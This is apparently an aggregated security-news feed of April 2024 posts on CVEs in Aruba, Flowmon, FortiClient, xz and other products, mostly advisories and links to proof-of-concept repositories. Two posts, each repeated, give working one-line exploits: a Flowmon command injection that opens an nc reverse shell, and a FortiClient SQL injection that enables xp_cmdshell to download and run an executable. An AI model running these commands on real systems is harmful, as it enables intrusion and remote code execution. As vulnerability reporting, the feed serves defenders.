On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##updated 2024-04-10T13:24:00.070000
6 posts
1 repos
🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##PoC Exploit Released For Windows Kernel EoP Vulnerability https://gbhackers.com/windows-kernel-eop-exploit-released/ #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft
##🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##PoC Exploit Released For Windows Kernel EoP Vulnerability https://gbhackers.com/windows-kernel-eop-exploit-released/ #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft
##🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability
One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).
https://github.com/exploits-forsale/CVE-2024-26218
X Link: https://twitter.com/DarkWebInformer/status/1784930649805029824
##updated 2024-04-09T21:32:08
2 posts
Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?
This would greatly simplify parsing for https://github.com/cve-search/vulnerability-lookup and many other tools.
#cve #vulnerability #opensource #opendata
Sample one: https://vulnerability.circl.lu/vuln/cve-2024-2957
##Could @cve @CVE_Program or NIST NVD consider adding rejection metadata (e.g., alternative CVEs) in the JSON structure instead of using free-text in the 'rejectedReasons' field?
This would greatly simplify parsing for https://github.com/cve-search/vulnerability-lookup and many other tools.
#cve #vulnerability #opensource #opendata
Sample one: https://vulnerability.circl.lu/vuln/cve-2024-2957
##updated 2024-04-09T18:30:28
2 posts
1 repos
CISA: CISA Adds One Known Exploited Vulnerability to Catalog
CISA adds CVE-2024-29988 (8.8 high, disclosed 09 April 2024 by Microsoft; SmartScreen Prompt Security Feature Bypass Vulnerability) to the Known Exploited Vulnerabilities (KEV) Catalog 21 days after Trend Micro and Zero Day Initiative disputed the Patch Tuesday omission of it as an exploited vulnerability.
#CVE_2024_29988 #vulnerability #knownexploitedvulnerabilitiescatalog #eitw #activeexploitation #zeroday
##CISA: CISA Adds One Known Exploited Vulnerability to Catalog
CISA adds CVE-2024-29988 (8.8 high, disclosed 09 April 2024 by Microsoft; SmartScreen Prompt Security Feature Bypass Vulnerability) to the Known Exploited Vulnerabilities (KEV) Catalog 21 days after Trend Micro and Zero Day Initiative disputed the Patch Tuesday omission of it as an exploited vulnerability.
#CVE_2024_29988 #vulnerability #knownexploitedvulnerabilitiescatalog #eitw #activeexploitation #zeroday
##updated 2024-04-08T22:47:13.533000
2 posts
1 repos
Alter Solutions: Local Privilege Escalating my way to root through Apple macOS filesystems
Yann Gascuel of Alter Solutions provides vulnerability details and Proof of Concept on CVE-2023-42931 (7.8 high) Local Privilege Escalation in macOS.
Note: This was originally patched and assigned a CVE back in December 2023, but did not get added to Apple's security advisories until 22 March 2024: About the security content of macOS Sonoma 14.2. It's a mess of a system where Apple quietly adds new CVEs to old security advisories without updating the associated RSS. Today 02 May 2024, CVE-2023-42931 is number 3 on the top 5 trending CVEs on Twitter, according to CVE Trends.
##Alter Solutions: Local Privilege Escalating my way to root through Apple macOS filesystems
Yann Gascuel of Alter Solutions provides vulnerability details and Proof of Concept on CVE-2023-42931 (7.8 high) Local Privilege Escalation in macOS.
Note: This was originally patched and assigned a CVE back in December 2023, but did not get added to Apple's security advisories until 22 March 2024: About the security content of macOS Sonoma 14.2. It's a mess of a system where Apple quietly adds new CVEs to old security advisories without updating the associated RSS. Today 02 May 2024, CVE-2023-42931 is number 3 on the top 5 trending CVEs on Twitter, according to CVE Trends.
##updated 2024-04-07T15:30:32
2 posts
8 repos
https://github.com/mrrobot0o/CVE-2024-3273-
https://github.com/adhikara13/CVE-2024-3273
https://github.com/Chocapikk/CVE-2024-3273
https://github.com/ThatNotEasy/CVE-2024-3273
https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT
https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273
https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE
SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##SANS ISC: D-Link NAS Device Backdoor Abused
SANS ISC sees a new distinct set of exploit attempts targeting D-Link NAS devices (which are End of Life and unsupported now), some of which use different URLs to attack vulnerable systems. No IOC provided.
I have not been able to find an associated CVE number.
FYI @jullrich, the associated CVE IDs are
#CVE_2024_3272 #CVE_2024_3273 #Dlink #eitw #activeexploitation
##updated 2024-04-04T07:16:03
2 posts
1 repos
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2024-04-04T04:29:06
2 posts
9 repos
https://github.com/kenbuckler/MOVEit-CVE-2023-34362
https://github.com/Malwareman007/CVE-2023-34362
https://github.com/errorfiathck/MOVEit-Exploit
https://github.com/lithuanian-g/cve-2023-34362-iocs
https://github.com/sfewer-r7/CVE-2023-34362
https://github.com/horizon3ai/CVE-2023-34362
https://github.com/deepinstinct/MOVEit_CVE-2023-34362_IOCs
https://github.com/toorandom/moveit-payload-decrypt-CVE-2023-34362
For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.
##For comparison, I think there were only about 2,500 instances of MOVEit Transfer exposed to the internet (also heavily concentrated in North America) when CVE-2023-34362 came to light.
##updated 2024-04-04T03:56:20
2 posts
1 repos
At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".
All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.
@Rairii called it in Feb with analysis of securebootai.dll
##At some point recently Microsoft updated their Baton Drop guidance to indicate that instead of playing DBX bootloader whack-a-mole they are revoking the Secure Boot "Windows Production PCA 2011" (first-party) cert. This will be enforced "at least six months after the Deployment phase", which is scheduled for July 2024 "or later".
All hail "Windows UEFI CA 2023" which surely won't have any of these issues ever again.
@Rairii called it in Feb with analysis of securebootai.dll
##updated 2024-04-04T03:41:35
2 posts
Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 https://i5c.us/d30890
##Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 https://i5c.us/d30890
##updated 2024-04-02T15:30:43
15 posts
26 repos
https://github.com/Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability
https://github.com/wjlin0/CVE-2024-23897
https://github.com/ThatNotEasy/CVE-2024-23897
https://github.com/Athulya666/CVE-2024-23897
https://github.com/brijne/CVE-2024-23897-RCE
https://github.com/yoryio/CVE-2024-23897
https://github.com/jopraveen/CVE-2024-23897
https://github.com/xaitax/CVE-2024-23897
https://github.com/kaanatmacaa/CVE-2024-23897
https://github.com/Nebian/CVE-2024-23897
https://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read
https://github.com/10T4/PoC-Fix-jenkins-rce_CVE-2024-23897
https://github.com/B4CK4TT4CK/CVE-2024-23897
https://github.com/CKevens/CVE-2024-23897
https://github.com/Abo5/CVE-2024-23897
https://github.com/vmtyan/poc-cve-2024-23897
https://github.com/h4x0r-dz/CVE-2024-23897
https://github.com/godylockz/CVE-2024-23897
https://github.com/binganao/CVE-2024-23897
https://github.com/Vozec/CVE-2024-23897
https://github.com/WLXQqwer/Jenkins-CVE-2024-23897-
https://github.com/viszsec/CVE-2024-23897
https://github.com/ifconfig-me/CVE-2024-23897
https://github.com/adhikara13/CVE-2024-2389
🥪 & #threatintel: we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.
(fixed CVE # from a previous post)
https://viz.greynoise.io/tags/progress-flowmon-cve-2024-2389-command-injection-rce-attempt?days=10
##🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-2389
X Link: https://twitter.com/DarkWebInformer/status/1783860822386659836
##The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/
##PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389) https://www.helpnetsecurity.com/2024/04/24/poc-cve-2024-2389/ #networkmonitoring #RhinoSecurity #vulnerability #enterprise #Don'tmiss #Progress #News #PoC
##Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi
##@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Rhino Labs has published a write-up on the bug here: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
The issue is tracked as CVE-2024-2389.
##Progress Kemp Flowmon CVE-2024-2389:
curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'
🥪 & #threatintel: we published a tag for CVE-2024-2389, a command-injection vulnerability in Progress Flowmon accessible without authentication.
(fixed CVE # from a previous post)
https://viz.greynoise.io/tags/progress-flowmon-cve-2024-2389-command-injection-rce-attempt?days=10
##🚨EXPLOIT CODE🚨PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389).
#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Flowmon #Infosec #CTI #CVE20242389 #Vulnerability
https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-2389
X Link: https://twitter.com/DarkWebInformer/status/1783860822386659836
##The security issue has the maximum severity score of 10/10 and was discovered by researchers at Rhino Security Labs. It is currently tracked as CVE-2024-2389. https://www.bleepingcomputer.com/news/security/maximum-severity-flowmon-bug-has-a-public-exploit-patch-now/
##Rhino Security Labs publishes vulnerability details of CVE-2024-2389, which they refer to as Unauthenticated Command Injection. This includes a proof of concept. 🔗https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
Historically, Rhino has recently reported on 2 other Progress vulnerabilities scoring an 8.4 and a 10.0. Absolutely clowning this vendor. h/t @campuscodi
##@cR0w your favorite company Progress Software is at it again with another perfect score 10.0 vulnerability 🥳 h/t @campuscodi
CVE-2024-2389 (10.0 critical, disclosed 02 April 2024) Unauthenticated, remote attackers can gain access to the web interface of Flowmon to issue a carefully crafted API command that will allow arbitrary system commands to be executed without authentication. Patched and not exploited in the wild. 🔗 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Progress Software has released a patch to fix an unauthenticated command injection vulnerability in its Kemp Flowmon network monitoring suite: https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Rhino Labs has published a write-up on the bug here: https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
The issue is tracked as CVE-2024-2389.
##Progress Kemp Flowmon CVE-2024-2389:
curl -kv 'https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'
updated 2024-04-01T16:13:53
2 posts
12 repos
https://github.com/TYuan0816/cve-2023-44487
https://github.com/terrorist/HTTP-2-Rapid-Reset-Client
https://github.com/sigridou/CVE-2023-44487-
https://github.com/ByteHackr/CVE-2023-44487
https://github.com/secengjeff/rapidresetclient
https://github.com/studiogangster/CVE-2023-44487
https://github.com/bcdannyboy/CVE-2023-44487
https://github.com/nxenon/cve-2023-44487
https://github.com/ReToCode/golang-CVE-2023-44487
https://github.com/pabloec20/rapidreset
Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##Hi there! You look like someone who appreciates the finer things in #ethicalhacking. 🥨 Snack on these fresh updates which include:
💥 New findings for publicly exposed VNC, MSSQL & LDAP services + comprehensive DNS records
👀 Detectors for CVE-2023-3824 (CVSSv3 9.8) & CVE-2023-44487 (CVSSv3 7.5)
🎯 Exploits for CVE-2024-0204 (CVSSv3 9.8) & CVE-2024-1212 (CVSSv3 10)
🥊 Detection for flaws in JWT implementations which lead to authentication security risks
🕷️ Extra information about spidered responses in Website Scanner evidence
🔥 Proof of exploitation for Linux OS command injection from the Website Scanner
and MORE!
Check out the video: https://youtu.be/-CZJhZvErsI?si=l-TOzCIzs-nsAx_z
Or the change log: https://pentest-tools.com/change-log
##updated 2024-04-01T15:30:38
1 posts
Grafana erlaubt als ""Feature"" jedem angemeldeten User beliebige SQL Queries abzusetzen.
CVE-2024-3128
https://fdlucifer.github.io/2024/04/22/grafana-sql-injection/
##updated 2024-03-29T18:30:50
5 posts
60 repos
https://github.com/robertdebock/ansible-playbook-cve-2024-3094
https://github.com/Mustafa1986/CVE-2024-3094
https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container
https://github.com/felipecosta09/cve-2024-3094
https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker
https://github.com/iheb2b/CVE-2024-3094-Checker
https://github.com/bioless/xz_cve-2024-3094_detection
https://github.com/k4t3pr0/Check-CVE-2024-3094
https://github.com/buluma/ansible-role-cve_2024_3094
https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker
https://github.com/0xlane/xz-cve-2024-3094
https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094
https://github.com/pentestfunctions/CVE-2024-3094
https://github.com/mesutgungor/xz-backdoor-vulnerability
https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector
https://github.com/weltregie/liblzma-scan
https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits
https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094
https://github.com/harekrishnarai/xz-utils-vuln-checker
https://github.com/robertdebock/ansible-role-cve_2024_3094
https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-
https://github.com/neuralinhibitor/xzwhy
https://github.com/Horizon-Software-Development/CVE-2024-3094
https://github.com/jfrog/cve-2024-3094-tools
https://github.com/r0binak/xzk8s
https://github.com/gustavorobertux/CVE-2024-3094
https://github.com/reuteras/CVE-2024-3094
https://github.com/ashwani95/CVE-2024-3094
https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer
https://github.com/galacticquest/cve-2024-3094-detect
https://github.com/Fractal-Tess/CVE-2024-3094
https://github.com/Juul/xz-backdoor-scan
https://github.com/badsectorlabs/ludus_xz_backdoor
https://github.com/Simplifi-ED/CVE-2024-3094-patcher
https://github.com/wgetnz/CVE-2024-3094-check
https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script
https://github.com/emirkmo/xz-backdoor-github
https://github.com/lockness-Ko/xz-vulnerable-honeypot
https://github.com/krascovict/OSINT---CVE-2024-3094-
https://github.com/mightysai1997/CVE-2024-3094-info
https://github.com/brinhosa/CVE-2024-3094-One-Liner
https://github.com/isuruwa/CVE-2024-3094
https://github.com/teyhouse/CVE-2024-3094
https://github.com/byinarie/CVE-2024-3094-info
https://github.com/amlweems/xzbot
https://github.com/bsekercioglu/cve2024-3094-Checker
https://github.com/hackingetico21/revisaxzutils
https://github.com/FabioBaroni/CVE-2024-3094-checker
https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check
https://github.com/Yuma-Tsushima07/CVE-2024-3094
https://github.com/ackemed/detectar_cve-2024-3094
https://github.com/zgimszhd61/cve-2024-3094-detect-tool
https://github.com/przemoc/xz-backdoor-links
https://github.com/ScrimForever/CVE-2024-3094
https://github.com/CyberGuard-Foundation/CVE-2024-3094
https://github.com/hazemkya/CVE-2024-3094-checker
https://github.com/dah4k/CVE-2024-3094
https://github.com/mightysai1997/CVE-2024-3094
Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.
Elaastic on CVE-2024-3094 🔗 https://discuss.elastic.co/t/elastic-security-statement-for-cve-2024-3094-xz-versions-5-6-0-and-5-6-1/357894
##On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.
Sysdig: Meet the Research behind our Threat Research Team – RSA 2024
I thought the title was a typo but Sysdig showcases various threats and vulnerabilities that their threat research team worked on: such as SSH-Snake, Romanian threat actor RUBYCARP, Operation SCARLETEEL, cryptojacking Operation AMBERSQUID, Meson Network, Operation LABRAT, CVE-2024-3094 (XZ Utils), and the Leaky Vessels vulnerabilities. You can meet the threat research team at booth S-742 at RSA Conference 2024, May 6 – 9 in San Francisco.
Elaastic on CVE-2024-3094 🔗 https://discuss.elastic.co/t/elastic-security-statement-for-cve-2024-3094-xz-versions-5-6-0-and-5-6-1/357894
##On March 29th, 2024, Elastic became aware of the malicious code planted in the xz package. Elastic has performed an investigation to identify any Elastic Products which may be impacted by this issue and we have concluded that no Elastic products use the versions of xz affected by this vulnerability. Therefore, Elastic Products are not affected by this issue.
For those that go crying on social media about an application telling you to curl | bash
or even to curl | sudo bash
because you're running arbitrary code as root:
That is useless unless you plan to carefully review and audit every line of code that runs on your computer.
Even if you do install said app, do you actually trust it's code ? Do you trust it's dependencies ? What about it's subdependencies ?
There's an infinity of ways to infect an open-source repo with bad code, and some of them are actually scarily easy to perform. Do you trust that your favorite compression utility doesn't contain code that backdoors freaking ssh (https://nvd.nist.gov/vuln/detail/CVE-2024-3094) ? Do you trust that a script won't remove a critical system directory because of a misplaced space (https://github.com/MrMEEE/bumblebee-Old-and-abbandoned/issues/123) ? Or that an ubiquitous logging library can allow remote code execution because of a bad default configuration (https://en.m.wikipedia.org/wiki/Log4Shell) ?
I hope I can get this message stuck deep inside your head and let you know that unless you make your own operating system from scratch (including your free bootloader, kernel, gpu driver and the rest), you have to trust somebody. And it only takes one mistake to compromise a whole distribution, or even worse. You have to balance between having a new shiny program and having a new way to get shelled.
##updated 2024-03-29T06:30:30
4 posts
Zero Day Initiative: CVE-2024-2887: A Pwn2Own Winning Bug in Google Chrome
Manfred Paul, who demonstrated a Type Confusion exploit in Google Chrome's WebAssembly at Pwn2Own Vancouver 2024, provides root cause analysis of this vulnerability, tracked as CVE-2024-2887 (CVSS score still pending). The impact gives arbitrary reads and writes within the V8 memory sandbox. An integer underflow leading to V8 Sandbox escape allows for arbitrary code execution on a read-write-execute page.
Zero Day Initiative: CVE-2024-2887: A Pwn2Own Winning Bug in Google Chrome
Manfred Paul, who demonstrated a Type Confusion exploit in Google Chrome's WebAssembly at Pwn2Own Vancouver 2024, provides root cause analysis of this vulnerability, tracked as CVE-2024-2887 (CVSS score still pending). The impact gives arbitrary reads and writes within the V8 memory sandbox. An integer underflow leading to V8 Sandbox escape allows for arbitrary code execution on a read-write-execute page.
In a new guest blog, #Pwn2Own winner @_manfp details CVE-2024-2887 - a bug he used to exploit both #Chrome and #Edge during the contest on his way to winning Master of Pwn. He breaks down the root cause and shows how he exploited it. Read the details at https://www.zerodayinitiative.com/blog/2024/5/2/cve-2024-2887-a-pwn2own-winning-bug-in-google-chrome
##In a new guest blog, #Pwn2Own winner @_manfp details CVE-2024-2887 - a bug he used to exploit both #Chrome and #Edge during the contest on his way to winning Master of Pwn. He breaks down the root cause and shows how he exploited it. Read the details at https://www.zerodayinitiative.com/blog/2024/5/2/cve-2024-2887-a-pwn2own-winning-bug-in-google-chrome
##updated 2024-03-26T01:00:02.003000
4 posts
1 repos
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##CVE-2023-48788 RCE:
echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##CVE-2023-48788 RCE:
echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013
updated 2024-03-21T05:01:12
2 posts
9 repos
https://github.com/yoryio/CVE-2024-27198
https://github.com/K3ysTr0K3R/CVE-2024-27198-EXPLOIT
https://github.com/passwa11/CVE-2024-27198-RCE
https://github.com/rampantspark/CVE-2024-27198
https://github.com/CharonDefalt/CVE-2024-27198-RCE
https://github.com/Stuub/RCity-CVE-2024-27198
https://github.com/Chocapikk/CVE-2024-27198
https://github.com/W01fh4cker/CVE-2024-27198-RCE
https://github.com/Shimon03/Explora-o-RCE-n-o-autenticado-JetBrains-TeamCity-CVE-2024-27198-
JetBrains TeamCity 2024.03.1 Is Here
Ah shit here we go again. JetBrains, notoriously averse to sharing vulnerability details, mentions 2 security problems being fixed in their TeamCity 2024.03.1 Release Notes but does not provide CVE IDs.
Why you should care about updating TeamCity:
A previous TeamCity vulnerability CVE-2024-27198 (9.8 critical, disclosed 04 March 2024, authentication bypass to create a new administrative user) was exploited within 24 hours of public disclosure (and release of their proofs of concept). It was added to CISA's KEV Catalog 3 days later.
JetBrains TeamCity 2024.03.1 Is Here
Ah shit here we go again. JetBrains, notoriously averse to sharing vulnerability details, mentions 2 security problems being fixed in their TeamCity 2024.03.1 Release Notes but does not provide CVE IDs.
Why you should care about updating TeamCity:
A previous TeamCity vulnerability CVE-2024-27198 (9.8 critical, disclosed 04 March 2024, authentication bypass to create a new administrative user) was exploited within 24 hours of public disclosure (and release of their proofs of concept). It was added to CISA's KEV Catalog 3 days later.
updated 2024-03-13T14:25:02.043000
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-08T18:30:35
2 posts
QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##QNAP security advisory: Multiple Vulnerabilities in QTS, QuTS hero, QuTScloud, myQNAPcloud, and myQNAPcloud Link (PWN2OWN 2023)
QNAP added 3 additional CVEs to a 09 March 2024 advisory: CVE-2024-27124, CVE-2024-32764 and CVE-2024-32766. QNAP hid the CVSSv3 scores, which isn't surprising given how disgustingly severe they were. No mention of exploitation.
#QNAP #vulnerability #CVE_2024_27124 #CVE_2024_32764 #CVE_2024_32766
##updated 2024-03-08T18:30:35
